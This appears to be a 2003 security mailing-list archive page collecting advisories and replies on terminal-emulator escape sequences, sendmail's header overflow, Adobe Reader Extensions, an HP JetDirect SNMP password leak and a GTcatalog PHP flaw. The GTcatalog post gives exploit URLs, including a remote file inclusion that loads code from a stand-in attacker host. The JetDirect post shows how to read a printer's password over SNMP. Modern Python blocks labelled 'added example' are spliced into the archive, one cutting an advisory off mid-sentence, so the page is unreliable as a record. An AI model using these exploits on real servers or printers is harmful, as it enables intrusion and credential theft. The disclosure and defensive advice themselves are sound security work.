GLSA: eterm (200303-1)

2003-03-03 Thread Daniel Ahlberg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - -
GENTOO LINUX SECURITY ANNOUNCEMENT 200303-1
- - -

  PACKAGE           : eterm
  SUMMARY           : dangerous interception of escape sequences
  DATE              : 2003-03-03 10:13 UTC
  EXPLOIT           : remote
  VERSIONS AFFECTED : 0.9.2
  FIXED VERSION     : 0.9.2
  CVE               : CAN-2003-0021 CAN-2003-0068

- - -

- From advisory:

Many of the features supported by popular terminal emulator software 
can be abused when un-trusted data is displayed on the screen. The 
impact of this abuse can range from annoying screen garbage to a 
complete system compromise. All of the issues below are actually 
documented features, anyone who takes the time to read over the man 
pages or source code could use them to carry out an attack.

Read the full advisory at:
http://marc.theaimsgroup.com/?l=bugtraq&m=104612710031920&w=2

SOLUTION

It is recommended that all Gentoo Linux users who are running
x11-terms/eterm upgrade to eterm-0.9.2-r3 as follows:

emerge sync
emerge -u eterm
emerge clean

- - -
[EMAIL PROTECTED] - GnuPG key is available at http://cvs.gentoo.org/~aliz
- - -
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+YyrSfT7nyhUpoZMRAmQMAJ9l+LP0d7ZiiU/ORWsHe8dfbizcygCfRRaY
0qutlqN466gl7gkPydYcc6c=
=W8wR
-END PGP SIGNATURE-


GLSA: vte (200303-2)

2003-03-03 Thread Daniel Ahlberg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - -
GENTOO LINUX SECURITY ANNOUNCEMENT 200303-2
- - -

  PACKAGE           : vte
  SUMMARY           : dangerous interception of escape sequences
  DATE              : 2003-03-03 10:16 UTC
  EXPLOIT           : remote
  VERSIONS AFFECTED : 0.10.25
  FIXED VERSION     : 0.10.25
  CVE               : CAN-2003-0070

- - -

- From advisory:

Many of the features supported by popular terminal emulator software 
can be abused when un-trusted data is displayed on the screen. The 
impact of this abuse can range from annoying screen garbage to a 
complete system compromise. All of the issues below are actually 
documented features, anyone who takes the time to read over the man 
pages or source code could use them to carry out an attack.

Read the full advisory at:
http://marc.theaimsgroup.com/?l=bugtraq&m=104612710031920&w=2

SOLUTION

It is recommended that all Gentoo Linux users who are running
x11-libs/vte upgrade to vte-0.10.25 as follows:

emerge sync
emerge -u vte
emerge clean

- - -
[EMAIL PROTECTED] - GnuPG key is available at http://cvs.gentoo.org/~aliz
- - -
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+YytrfT7nyhUpoZMRAmM4AJ9GiRX6v2zDkr0hftZ5hWc0rP8FtwCfWjsM
sM4EOkJZrokHlfOWLABLBgo=
=+/3p
-END PGP SIGNATURE-


Re: Netscape Communicator 4.x sensitive informations in configurationfile

2003-03-03 Thread MightyE
Although keeping the password plaintext in a configuration file isn't 
the best way to handle a password that software needs to remember, I do 
however want to point out that in order for programs to remember your 
password, they *must* store the password in some sort of reversible
obfuscation, meaning that once the obfuscation algorithm is known, the 
password is no more secure no matter how obfuscated it gets, as the 
software must at some point in time return it to a plaintext form in 
order to make use of it.

Obfuscating stored passwords only provides a minimal level of additional 
protection.  If you are using a system where someone has access to your 
configuration files (example: public computer lab in a library or 
college campus), then do *not* store your password on that machine.  If 
someone has the same access to that machine as you do, consider any 
information you store on it to be publicly available, and take 
appropriate precautions for sensitive information.

-MightyE

Neil Dickey wrote:

Marc Ruef [EMAIL PROTECTED] wrote:


The following paste shows the IMAP mail part of this configuration file.
You can see that the line 17 shows the unencrypted password
(MyPassword4).
[ ... Snip ... ]

user_pref("mail.imap.server.imap.computec.ch.password", "MyPassword4");
user_pref("mail.imap.server.imap.computec.ch.remember_password", true);


I notice from the line immediately following that you have the package
remember your password.  It's been my understanding that doing so is
bad practice because that's just the sort of thing that someone probing
your system would very likely be looking for.  Certainly if you save
your password only in your head, then whether or not the program stores
it in the clear is a moot question.  ;-)
Best regards,

Neil Dickey, Ph.D.
Research Associate/Sysop
Geology Department
Northern Illinois University
DeKalb, Illinois
60115






Implementation flaws in Adobe Document Server for Reader Extensions

2003-03-03 Thread info

Summary
===

The free Adobe Acrobat Reader (version 5.1 or later) has the ability to: add notes and
attachments, add and check digital signatures, save forms locally, fill them
out online, distribute them to others for review and commenting, and submit forms
via e-mail or the Web directly from within Acrobat Reader. But the actions listed
above are available for rights-enabled documents only (i.e. documents processed
by Adobe Document Server for Reader Extensions). Improper usage of cryptography
in the server software allows anyone to produce reader-enabled documents without
Document Server for Reader Extensions.

Contact information
===

Name   : ElcomSoft Co.Ltd.
E-mail : [EMAIL PROTECTED]
Fax: +1 866 448-2703 (US/Canada, toll-free)

The problem has been reported to vendor (Adobe Systems Inc) on
02/24/2003; vendor has not replied.

Technical info
===

Adobe Document Server for Reader Extensions
---

With this server, customers can assign custom usage rights to specific Adobe
Portable Document Format (PDF) forms and documents, so Acrobat Reader 5.1 users
can get access to additional features while working with the document. The
server can enable four types of usage rights on a PDF form:

- Commenting tools, including sticky notes, highlights, stamps, and
  strikethroughs;
- The ability to save a form to a desktop for offline completion or archiving,
  without losing any forms data;
- Digital signatures, including support for Public Key Infrastructure systems
  for third-party validation (VeriSign, Entrust, and others);
- Advanced form features, including the ability to submit a form offline or via
  email, import or export forms data and attached files.

Description of Adobe Document Server for Reader Extensions features is
available at http://www.adobe.com/products/server/readerextensions/main.html.

The implementation of Document Server for Reader Extensions does not seem to be
very complicated. The server just gets the PDF file (to be reader-enabled)
together with the list of enabling options, and produces a new document that
contains one additional dictionary - actually, simply by adding an additional
block of data.

Note: for details of PDF structure, see Portable Document Format Specification
http://partners.adobe.com/asn/developer/acrosdk/docs/filefmtspecs/PDFReference.pdf

The new dictionary is named ViewerPreferences and resides within the document's
Root dictionary. For now, only one element is placed inside the
ViewerPreferences dictionary - the Rights dictionary. The content of the Rights
dictionary can be described as follows (key name, type and description):

Version (number): A number specifying the version of Rights dictionary.
Currently only version 1 is supported.

Document (array of names): List of flags related to Document operations.
Currently only one flag is supported: FullSave.

Form (array of names): List of flags related to Form processing. Supported
flags: Import, Export, SubmitStandalone, SpawnTemplate.

Annots (array of names): List of flags related to Annotations. Supported
flags: Create, Delete, Modify, Copy, Import, Export.

Signature (array of names): List of flags related to Digital Signature
handling. Currently only one flag is supported: Modify.

Msg (text string): Arbitrary string to be displayed in Instructions box
when reader-enabled document is opened in Acrobat Reader 5.1.

TimeOfUbiquitization (date): The date and time when document was processed
by Document Server for Reader Extensions.

RightsID or ADBE_RightsID (array): List of RSA-based digital signatures
for checking integrity of reader-enabling attributes.

Most elements listed in the table above are self-descriptive. The name of the last
key could be either RightsID or ADBE_RightsID - they are equivalent in Reader
5.1. Values in the RightsID (or ADBE_RightsID) array are 512-bit RSA-encrypted
values, and could be decrypted with an RSA public key, which is hard-coded (in
encrypted form) within the Reader 5.1 executable. Those values are used as digital
signatures of some critical document parts to make sure that the document was
reader-enabled with Adobe Document Server for Reader Extensions.

Sample form with additional usage rights could be downloaded from
http://www.adobe.com/products/server/readerextensions/pdfs/sample_docserver_readerext.pdf

According to press release from October 21, 2002, available at
http://www.adobe.com/aboutadobe/pressroom/pressreleases/pdfs/200210/20021021Ubiquity.pdf,
pricing of Adobe Document Server for Reader Extensions starts at US$75,000.

Adobe Acrobat Reader
---

Adobe Acrobat Reader is the most popular part of Adobe Acrobat product family.
Acrobat Reader is 
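The Rights dictionary described in the advisory is ordinary PDF syntax, so its contents can be inspected without Acrobat. The following Python is an added example, not Adobe or ElcomSoft code: it locates the /Rights dictionary under /ViewerPreferences in an uncompressed PDF and returns the usage-right flags, message, timestamp and RightsID values. The PDF fragment it runs on is constructed from the key list above (the hex-string form of the RightsID entries and all literal values are assumptions); object streams, indirect references and the ">>>" tokenising corner case are not handled.

```python
import re

# Added example (not Adobe or ElcomSoft code): read the Reader Extensions
# /Rights dictionary out of an uncompressed PDF and report what it enables.
# Keys follow the advisory's list: Version, Document, Form, Annots, Signature,
# Msg, TimeOfUbiquitization and RightsID / ADBE_RightsID.

_RIGHTS_KEY = re.compile(r"/Rights(?![A-Za-z0-9_])")            # /Rights, not /RightsID
_NAME_ARRAY = re.compile(r"/(Document|Form|Annots|Signature)\s*\[([^\]]*)\]")
_NAME = re.compile(r"/([A-Za-z0-9_]+)")
_VERSION = re.compile(r"/Version\s+(\d+)")
_MSG = re.compile(r"/Msg\s*\(((?:\\.|[^\\)])*)\)", re.DOTALL)    # literal string, \-escapes
_TIME = re.compile(r"/TimeOfUbiquitization\s*\(([^)]*)\)")
_SIGS = re.compile(r"/(?:ADBE_)?RightsID\s*\[\s*((?:<[0-9A-Fa-f\s]*>\s*)+)\]")
_HEX = re.compile(r"<([0-9A-Fa-f\s]*)>")


def find_rights_dict(pdf: bytes) -> str:
    """Return the text of the /Rights << ... >> dictionary (nested << >> handled), or ''."""
    text = pdf.decode("latin-1")
    m = _RIGHTS_KEY.search(text)
    if not m:
        return ""
    i = text.find("<<", m.end())
    depth, j = 0, i
    while 0 <= i and j < len(text):
        if text.startswith("<<", j):
            depth += 1
            j += 2
        elif text.startswith(">>", j):
            depth -= 1
            j += 2
            if depth == 0:
                return text[i:j]
        else:
            j += 1
    return ""


def parse_rights(pdf: bytes) -> dict:
    """Decode the usage rights; an empty dict means the file carries no Rights dictionary."""
    d = find_rights_dict(pdf)
    if not d:
        return {}
    rights = {}
    m = _VERSION.search(d)
    rights["Version"] = int(m.group(1)) if m else None
    for key, body in _NAME_ARRAY.findall(d):          # arrays of names -> list of flags
        rights[key] = _NAME.findall(body)
    m = _MSG.search(d)
    if m:
        rights["Msg"] = m.group(1)
    m = _TIME.search(d)
    if m:
        rights["TimeOfUbiquitization"] = m.group(1)
    m = _SIGS.search(d)
    if m:
        # Hex-string form is an assumption; bytes.fromhex tolerates the whitespace PDF allows.
        rights["RightsID"] = [bytes.fromhex(h) for h in _HEX.findall(m.group(1))]
    return rights


# Constructed sample: a catalog object carrying the dictionary the advisory describes.
SAMPLE_PDF = (
    b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R\n"
    b"   /ViewerPreferences << /Rights << /Version 1\n"
    b"      /Document [/FullSave]\n"
    b"      /Form [/Import /Export /SubmitStandalone /SpawnTemplate]\n"
    b"      /Annots [/Create /Delete /Modify /Copy /Import /Export]\n"
    b"      /Signature [/Modify]\n"
    b"      /Msg (Constructed sample \\(not an Adobe message\\))\n"
    b"      /TimeOfUbiquitization (D:20030224120000Z)\n"
    b"      /ADBE_RightsID [<00112233> <aabbccdd>] >> >>\n"
    b">>\nendobj\n"
)

if __name__ == "__main__":
    for key, value in parse_rights(SAMPLE_PDF).items():
        print(f"{key}: {value}")
```

Feeding a real reader-enabled file to parse_rights() tells you which of the four right classes it grants; the RightsID values are what the advisory says Reader checks against its built-in RSA public key, and this code only extracts them, it does not verify them.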

New HP Jetdirect SNMP password vulnerability when using Web JetAdmin

2003-03-03 Thread Sven Pechler


Hello,

During an analysis of some HP Jetdirect cards I discovered a security 
issue that could lead to full access to a networked printer. 

It looks like the vulnerability described in 
http://www.securityfocus.com/bid/5331, but the OID is different and you 
can only obtain one specific password.  
It is also different from the password vulnerability described in 
http://www.securityfocus.com/bid/3132


It applies to the following situation:

- Any operating system

-HP Jetdirect cards JetDirect 300X, (J3263A), JetDirect EX Plus (J2591A), 
JetDirect 400N (J2552A, J2552B), JetDirect 600N (J3110A, J3111A, J3113A) 
and older.

-The Jetdirect card is being managed from HP Web Jetadmin.

-A Web Jetadmin device password had been set on the JetDirect card. 
(This password must be set from Web Jetadmin and has nothing to do with 
the Telnet password or the SNMP Set community name)

In the above situation the Web Jetadmin device password is readable as 
plain ASCII text from the JetDirect card using SNMP.


How to check your printers for this vulnerability:

Use an SNMP toolkit to read the following OID from your printer:
.iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net-printer.generalDeviceStatus.gdPasswords
(In numerical format: .1.3.6.1.4.1.11.2.3.9.1.1.13.0)

An example on a Windows machine, using SNMPUTIL from the Windows Resource 
kit:
C:\>snmputil get 131.155.120.118 public .1.3.6.1.4.1.11.2.3.9.1.1.13.0
Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0
Value    = String 0x410x420x430x440x550x560x3d0x310x300x380x3b0x000x000x000x00 ..etc...

The resulting string reads in ASCII: ABCDEF=108;  
The Web Jetadmin device password is the word before the '=' sign, in this 
case: ABCDEF


How to protect your printer:

1.  Keep the Web Jetadmin device password EMPTY (don't do this on 
newer cards than the ones mentioned above)
2.  Define a 'Set community name'  instead

Additional means of protection (does not address the SNMP vulnerability):
3.  Define a telnet password (do not keep it empty)
4.  Create an 'allow list' from the Telnet console to restrict access 
from defined IP-addresses 



Sven Pechler
University of Technology Eindhoven
Faculty of Technology Management
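Sven's check is easy to script across a printer fleet. The following Python is an added example, not HP or Web Jetadmin code: it parses the gdPasswords octet string as printed by Microsoft's snmputil (the 0x41 0x42 ... form shown above) or by net-snmp's snmpget, applies his rule that the password is whatever precedes the first '=', and reports that no password is set when that field is empty. The sample tool outputs are constructed; query_printer() assumes net-snmp's snmpget is on PATH and is the only function that touches the network.

```python
import re
import shutil
import subprocess

# Added example, not HP or Web Jetadmin code: extract the Web Jetadmin device password
# from the gdPasswords octet string (OID .1.3.6.1.4.1.11.2.3.9.1.1.13.0) using the rule
# in the message above: the value is ASCII and the password precedes the first '='.

GD_PASSWORDS_OID = ".1.3.6.1.4.1.11.2.3.9.1.1.13.0"

_SNMPUTIL_OCTET = re.compile(r"0x([0-9a-fA-F]{2})")                   # snmputil: 0x410x42...
_NETSNMP_HEX = re.compile(r"Hex-STRING:\s*((?:[0-9a-fA-F]{2}\s*)+)")  # snmpget -Ox
_NETSNMP_STR = re.compile(r'STRING:\s*"?(.*?)"?\s*$')                 # snmpget, printable value


def octets_from_tool_output(output: str) -> bytes:
    """Recover the raw octet string from the text an SNMP client printed."""
    m = _NETSNMP_HEX.search(output)
    if m:
        return bytes.fromhex(m.group(1))
    hexes = _SNMPUTIL_OCTET.findall(output)
    if hexes:
        return bytes.fromhex("".join(hexes))
    m = _NETSNMP_STR.search(output.strip())
    if m:
        return m.group(1).encode("latin-1")
    return b""


def webjetadmin_password(raw: bytes):
    """Password is the text before the first '='; no '=' or an empty field means none is set."""
    if b"=" not in raw:
        return None
    password = raw.split(b"=", 1)[0].strip(b"\x00").decode("ascii", "replace")
    return password or None


def query_printer(host: str, community: str = "public") -> bytes:
    """Fetch gdPasswords from a live device. Assumes net-snmp's snmpget is installed."""
    if shutil.which("snmpget") is None:
        raise RuntimeError("snmpget (net-snmp) not installed")
    result = subprocess.run(
        ["snmpget", "-v1", "-c", community, "-Ox", host, GD_PASSWORDS_OID],
        capture_output=True, text=True, check=True,
    )
    return octets_from_tool_output(result.stdout)


# Constructed samples in the two output formats; both carry "ABCDEF=108;" plus NUL padding.
SAMPLE_SNMPUTIL = (
    "Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0\n"
    "Value    = String 0x410x420x430x440x450x460x3d0x310x300x380x3b0x000x000x000x00\n"
)
SAMPLE_NETSNMP = ("SNMPv2-SMI::enterprises.11.2.3.9.1.1.13.0 = Hex-STRING: "
                  "41 42 43 44 45 46 3D 31 30 38 3B 00 00 \n")

if __name__ == "__main__":
    for sample in (SAMPLE_SNMPUTIL, SAMPLE_NETSNMP):
        raw = octets_from_tool_output(sample)
        print(raw, "->", webjetadmin_password(raw) or "(no Web Jetadmin password set)")
```

Run it against each printer with query_printer(host) and treat any non-None result as a finding: the card is one of the affected models and a Web Jetadmin device password is set, which is exactly the condition Sven says to avoid.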


Contact for Palm Computing

2003-03-03 Thread Joel Maslak

Does anyone know who is the security contact for Palm Computing (PalmOS)?

-- 
Joel Maslak



GTcatalog (PHP)

2003-03-03 Thread Frog Man


Informations :
°°
Version : 0.9
Website : http://www.geektweaked.com
Problem :
- Informations Disclosure (Admin Password)
- File Including


PHP Code/Location :
°°°
password.inc :

<?
$globalpw = "[PASSWORD]";
?>

index.php :

[...]
switch ($function)
{
case "custom":

    $cc = new Template();
    $cc->set_file("head", $dir_base.$dir_template."header.inc");
    $cc->set_var(array('clientcode' => $cfg_clientcode,
                       'title'      => $cfg_title." - ".$custom));
    $cc->parse("output", "head");
    $cc->p("output");
    include($custom.".custom.inc");
    include($dir_base.$dir_template."footer.inc");
    break;
[...]

Exploits :
°°
- http://[target]/password.inc
- http://[target]/index.php?function=custom&custom=http://[attacker]/1
with :
http://[attacker]/1.custom.inc
Patch :
°°°
A patch can be found on http://www.phpsecure.info (-> New Version !! :))
More Details :
°°
In French :
http://www.frog-man.org/tutos/GTcatalog.txt
[EMAIL PROTECTED]



_
MSN Messenger : discutez en direct avec vos amis !  
http://messenger.fr.msn.be



Mail Header Buffer Overflow In Sendmail

2003-03-03 Thread SGI Security Coordinator
-BEGIN PGP SIGNED MESSAGE-

__
  SGI Security Advisory


Title: Mail Header Buffer Overflow In Sendmail
Number   : 20030301-01-P
Date : March 3, 2003
Reference: CERT VU#398025
Reference: CERT CA-2003-07
Reference: CVE CAN-2002-1337
Reference: SGI BUG 869098 875386 880975

Fixed in : IRIX 6.5.20 or patches 4975 and 4976
__

- ---
- --- Issue Specifics ---
- ---

ISS and sendmail.org have reported that there is a vulnerability involving
mail header manipulation that can result in a remote user gaining
root access to a system receiving mail through sendmail.

http://www.sendmail.org/8.12.8.html
http://www.cert.org/advisories/CA-2003-07.html
http://www.kb.cert.org/vuls/id/398025
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1337

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected with patches and in future releases of
IRIX.


- --
- --- Impact ---
- --

The sendmail binary is installed by default on IRIX 6.5 systems as part of
eoe.sw.base.

To determine the version of IRIX you are running, execute the following
command:

  # /bin/uname -R

That will return a result similar to the following:

  # 6.5 6.5.19f

The first number (6.5) is the release name, the second (6.5.16f in this
case) is the extended release name.  The extended release name is the
version we refer to throughout this document.


- 
- --- Temporary Workaround ---
- 

At this time, there is no effective workaround (other than disabling
sendmail) for these problems.  SGI recommends either upgrading to IRIX
6.5.20, or installing the appropriate patch from the listing below.


- 
- --- Solution ---
- 

SGI has provided a series of patches for these vulnerabilities. Our
recommendation is to upgrade to IRIX 6.5.20 when available, or install the
appropriate patch.

   OS Version     Vulnerable?     Patch #      Other Actions
   ----------     -----------     -------      -------------
   IRIX 3.x        unknown                     Note 1
   IRIX 4.x        unknown                     Note 1
   IRIX 5.x        unknown                     Note 1
   IRIX 6.0.x      unknown                     Note 1
   IRIX 6.1        unknown                     Note 1
   IRIX 6.2        unknown                     Note 1
   IRIX 6.3        unknown                     Note 1
   IRIX 6.4        unknown                     Note 1
   IRIX 6.5        yes                         Notes 2 & 3
   IRIX 6.5.1      yes                         Notes 2 & 3
   IRIX 6.5.2      yes                         Notes 2 & 3
   IRIX 6.5.3      yes                         Notes 2 & 3
   IRIX 6.5.4      yes                         Notes 2 & 3
   IRIX 6.5.5      yes                         Notes 2 & 3
   IRIX 6.5.6      yes                         Notes 2 & 3
   IRIX 6.5.7      yes                         Notes 2 & 3
   IRIX 6.5.8      yes                         Notes 2 & 3
   IRIX 6.5.9      yes                         Notes 2 & 3
   IRIX 6.5.10     yes                         Notes 2 & 3
   IRIX 6.5.11     yes                         Notes 2 & 3
   IRIX 6.5.12     yes                         Notes 2 & 3
   IRIX 6.5.13     yes                         Notes 2 & 3
   IRIX 6.5.14     yes                         Notes 2 & 3
   IRIX 6.5.15     yes             4975        Notes 2, 4 & 5
   IRIX 6.5.16     yes             4975        Notes 2, 4 & 5
   IRIX 6.5.17     yes             4975        Notes 2, 4 & 5
   IRIX 6.5.18     yes             4975        Notes 2, 4 & 5
   IRIX 6.5.19     yes             4976        Notes 2, 4 & 6
   IRIX 6.5.20     no

   NOTES

 1) This version of the IRIX operating system has been retired. Upgrade to an
actively supported IRIX operating system.  See
http://support.sgi.com/irix/news/index.html#policy for more
information.

 2) If you have not received an IRIX 6.5.X CD for IRIX 6.5, contact your
SGI Support Provider or URL: http://support.sgi.com/irix/swupdates/

 3) Upgrade to IRIX 6.5.20

 4) Install the patch

 5) This patch also fixes the smrsh issue discussed in SGI Security
Bulletin 20030101-01-P.

 6) This patch also fixes the relaying issue discussed in SGI Security
Bulletin 20030101-01-P.


- 
- --- Acknowledgments 
- 

SGI wishes to thank sendmail.org, ISS, CERT, and the users of the Internet
Community at large for their assistance in this matter.


# Patch File Checksums 

The actual patch will be a tar file containing 

Re: Terminal Emulator Security Issues

2003-03-03 Thread Michael Jennings
  Would stripping escape sequences from the window title work? Do you
  know of any applications that actually use this feature?
 
 ...snip...

 (Incidentally, I was unable to embed any such sequences in the
 title/icon name in 0.9.2 anyway...but I didn't try for very long, so
 I may have missed something.)

After further investigation, I'd like to point out the following:

Eterm has *never* allowed any control characters in its title/icon
name sequences.  The following bit of code has existed at least since
Eterm was first committed to CVS:

else if (ch < ' ')
    return; /* control character - exit */

in term.c::process_xterm_seq(), line 1270 or so.

So there was never any way to get escape sequences in the title to
begin with, meaning that the command cannot be hidden using any
character attributes or background/foreground color matching.

Furthermore, the title which is printed via the \e[21t sequence is
limited to just under 1024 characters, which is not enough to cause
the command to scroll off the screen on any but the smallest of
terminals.

Thus, the following footnote from the original report applies to Eterm
as well:

[1] Although putty would place the title onto the command-line, we
were not able to find a method of hiding the command, since
neither the invisible character attribute nor the foreground
color could be set. Putty has a relatively low limit to the number
of characters that can be placed into the window title, so it is
not possible to simply flood the screen with garbage and hope the
command rolls past the current view.

Having said all that, it would seem that Eterm 0.9.2 is not vulnerable
to ANY of the issues mentioned in this report.  As such, all
distributions shipping older versions of Eterm should be safe after
upgrading to 0.9.2.  To that end, Eterm source and RPM packages are
available for download at http://www.eterm.org/download/ for any
vendor/user with 0.9.1 or earlier.

Hope that clears everything up. :-)

Regards,
Michael

-- 
Michael Jennings (a.k.a. KainX)  http://www.kainx.org/  [EMAIL PROTECTED]
n + 1, Inc., http://www.nplus1.net/   Author, Eterm (www.eterm.org)
---
 By the time they had diminished from 50 to 8, the other dwarves 
  began to suspect 'Hungry' ...-- Gary Larson, The Far Side


Re: sendmail 8.12.8 available

2003-03-03 Thread Florian Weimer
Claus Assmann [EMAIL PROTECTED] writes:

 Sendmail, Inc., and the Sendmail Consortium announce the availability
 of sendmail 8.12.8.  It contains a fix for a critical security
 problem discovered by Mark Dowd of ISS X-Force; we thank ISS X-Force
 for bringing this problem to our attention.  Sendmail urges all users to
 either upgrade to sendmail 8.12.8 or apply the patch for 8.12 that
 is part of this announcement.

Would people be willing to share filter rules for other MTAs to block
offending messages on relays?

Thanks,
-- 
Florian Weimer[EMAIL PROTECTED]
University of Stuttgart   http://CERT.Uni-Stuttgart.DE/people/fw/
RUS-CERT  fax +49-711-685-5898
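Florian's question is about recognising the offending messages on a relay rather than patching sendmail itself. The 8.12.8 release note quoted further down this page says the fix drops sender and recipient header comments when they are too long, so a relay-side filter can apply the same test. The following Python is an added example, not sendmail's crackaddr() and not a rule for any particular MTA: it walks the address headers of a message, extracts each RFC 2822 comment with nesting and backslash quoting handled, and reports any comment longer than a limit. The 256-byte default is an assumption chosen to match sendmail's MAXNAME; the sample messages are constructed.

```python
import email
from email import policy

# Added example, not sendmail code and not an MTA rule set: flag messages whose
# address headers carry an RFC 2822 comment "(...)" longer than a limit, which is
# the condition the 8.12.8 fix reacts to by dropping the comment.  The 256-byte
# default is an assumption chosen to match sendmail's MAXNAME.

ADDRESS_HEADERS = ("from", "sender", "reply-to", "to", "cc", "bcc",
                   "resent-from", "resent-sender", "resent-to", "resent-cc")


def header_comments(value: str):
    """Yield each top-level comment in a header value, nested parentheses included.
    A backslash quotes the next character; a quoted string "..." cannot open a comment."""
    depth, start, i, in_quotes = 0, -1, 0, False
    while i < len(value):
        c = value[i]
        if c == "\\":
            i += 2                      # skip the quoted character
            continue
        if c == '"' and depth == 0:
            in_quotes = not in_quotes
        elif not in_quotes:
            if c == "(":
                if depth == 0:
                    start = i
                depth += 1
            elif c == ")" and depth:
                depth -= 1
                if depth == 0:
                    yield value[start:i + 1]
        i += 1
    if depth:                           # unterminated comment runs to end of header
        yield value[start:]


def oversized_comments(raw: bytes, limit: int = 256):
    """Return [(header_name, comment_length), ...] for every comment over the limit."""
    msg = email.message_from_bytes(raw, policy=policy.compat32)
    hits = []
    for name, value in msg.items():
        if name.lower() in ADDRESS_HEADERS:
            for comment in header_comments(str(value)):
                if len(comment) > limit:
                    hits.append((name, len(comment)))
    return hits


# Constructed messages: a normal one and one carrying a 300-character comment.
BENIGN = (b"From: Alice (Acme Corp) <alice@example.com>\r\n"
          b"To: bob@example.com\r\nSubject: hi\r\n\r\nbody\r\n")
SUSPECT = (b"From: <alice@example.com> (" + b"A" * 300 + b")\r\n"
           b"To: bob@example.com\r\nSubject: hi\r\n\r\nbody\r\n")

if __name__ == "__main__":
    for label, raw in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, oversized_comments(raw) or "ok")
```

A hit is a reason to quarantine or log, not proof of an exploit attempt: legitimate mail almost never carries comments of that size in address headers, but the check is a heuristic on the condition the fix names, not a signature for the overflow itself.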


Sendmail buffer overflow vulnerability in AIX.

2003-03-03 Thread Shiva Persaud





-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

IBM SECURITY ADVISORY

First Issued: Fri Feb 21 11:00:00 CST 2003

===
   VULNERABILITY SUMMARY

VULNERABILITY:  sendmail buffer overflow vulnerability.

PLATFORMS:  AIX 4.3, 5.1 and 5.2

SOLUTION:   Apply the workaround, efix or APARs as described below.

THREAT: A remote attacker can exploit a buffer overflow to
gain root privileges.

CERT VU Number: 398025
CVE Number: n/a
===
   DETAILED INFORMATION


I.  Description
===

Sendmail is a MTA (mail transfer agent) that routes mail for local or
network delivery. When sendmail receives a message it translates the
format of message headers to match the requirements of the destination
system. The program determines the destination via the syntax and content
of the address field in a message header. A vulnerability that exploits
how message headers are parsed has been found. This vulnerability allows
a remote attacker to gain root privileges. At this time, there is no known
exploit in the wild for this vulnerability.

The sendmail daemon runs on all versions of AIX by default. To determine
if sendmail is running on your system execute the following:

#lssrc -s sendmail

If sendmail is running, the following will be displayed:

Subsystem         Group            PID     Status
 sendmail         mail             <pid>   active

Where <pid> is the pid of the sendmail process on your system.

If sendmail is not installed, the system is not vulnerable.


II. Impact
==

A remote attacker can gain root privileges.


III.  Solutions
===

A. Official Fix
IBM provides the following fixes:

  APAR number for AIX 4.3.3: IY40500 (available approx. 03/12/2003)
  APAR number for AIX 5.1.0: IY40501 (available approx. 04/28/2003)
  APAR number for AIX 5.2.0: IY40502 (available approx. 04/28/2003)

NOTE: Fixes will not be provided for versions prior to 4.3 as
these are no longer supported by IBM. Affected customers are
urged to upgrade to 4.3.3 or 5.1.0 at the latest maintenance level.

B. E-fix
Temporary fixes for AIX 4.3.3, 5.1.0, and 5.2.0 systems are available.

The temporary fixes can be downloaded via ftp from:

 ftp://aix.software.ibm.com/aix/efixes/security/sendmail_efix.tar.Z

The efix compressed tarball contains three fixes: one each for
AIX 4.3.3, AIX 5.1.0 and AIX 5.2.0. It also includes this Advisory
and a README file with installation instructions.

Verify you have retrieved this efix intact:
- - -
There are 3 fix-files in this package for the 4.3.3, 5.1.0, 5.2.0
releases. The checksums below were generated using the sum and
md5 commands and are as follows:

Filename        sum (checksum blocks)   md5
=================================================================
sendmail.433    61331   428             013f747e5a447e2dec777e2e840914a9
sendmail.510    34257  1059             5f282fd2a472c2d75c88c3c652312842
sendmail.520    45494  1007             88bcb028aab4625abe0257d3537a0813

These sums should match exactly; if they do not, double check the
command results and the download site address. If those are OK,
contact IBM AIX Security at [EMAIL PROTECTED] and describe
the discrepancy.

IMPORTANT: Create a mksysb backup of the system and verify it is
both bootable, and readable before proceeding.

These temporary fixes have not been fully regression tested; thus,
IBM does not warrant the fully correct functioning of the efix.
Customers install the efix and operate the modified version of AIX
at their own risk.

Efix Installation Instructions:
- - -
Detailed installation instructions can be found in the README file
supplied in the efix package. These instructions are summarized below.

You need to have the following filesets installed. This ensures that
the proper versions of co-requisite system files, such as libc.a, are
installed:

For AIX 4.3.3:
bos.net.tcp.client.4.3.3.87

For AIX 5.1.0:
bos.net.tcp.client.5.1.0.38

For AIX 5.2.0:
bos.net.tcp.client.5.2.0.1

You can determine which fileset is installed by executing
the following:

   # lslpp -L bos.net.tcp.client


1. Create a temporary efix directory and move to that directory.
   # mkdir /tmp/efix
   # cd /tmp/efix

2. Move the efix to /tmp/efix, uncompress it and un-tar the resulting
   tarfile. Move to the fix directory.
   # cp PATH_TO_ADVISORY /tmp/efix # where PATH_TO_ADVISORY is the fully
   # qualified path to the efix package.
   # uncompress sendmail_efix.tar.Z
   # tar xvf sendmail_efix.tar
   # cd sendmail_efix

3. Rename the patched binary files appropriate for your system and set
   ownership and permissions.
   # mv sendmail.xxx sendmail  # where xxx is 433, 510 or 520
   # 

sendmail 8.12.8 available

2003-03-03 Thread Claus Assmann
-BEGIN PGP SIGNED MESSAGE-

Sendmail, Inc., and the Sendmail Consortium announce the availability
of sendmail 8.12.8.  It contains a fix for a critical security
problem discovered by Mark Dowd of ISS X-Force; we thank ISS X-Force
for bringing this problem to our attention.  Sendmail urges all users to
either upgrade to sendmail 8.12.8 or apply the patch for 8.12 that
is part of this announcement.  Patches for older versions can be
downloaded from ftp.sendmail.org, see http://www.sendmail.org/ for
details.  Remember to check the PGP signatures of patches or releases
obtained.  For those not running the open source version, check
with your vendor for a patch.  There is a bug fix for ident parsing
in 8.12.8.  While this is not believed to be exploitable, if you
are not upgrading to 8.12.8, you may want to turn off ident checking
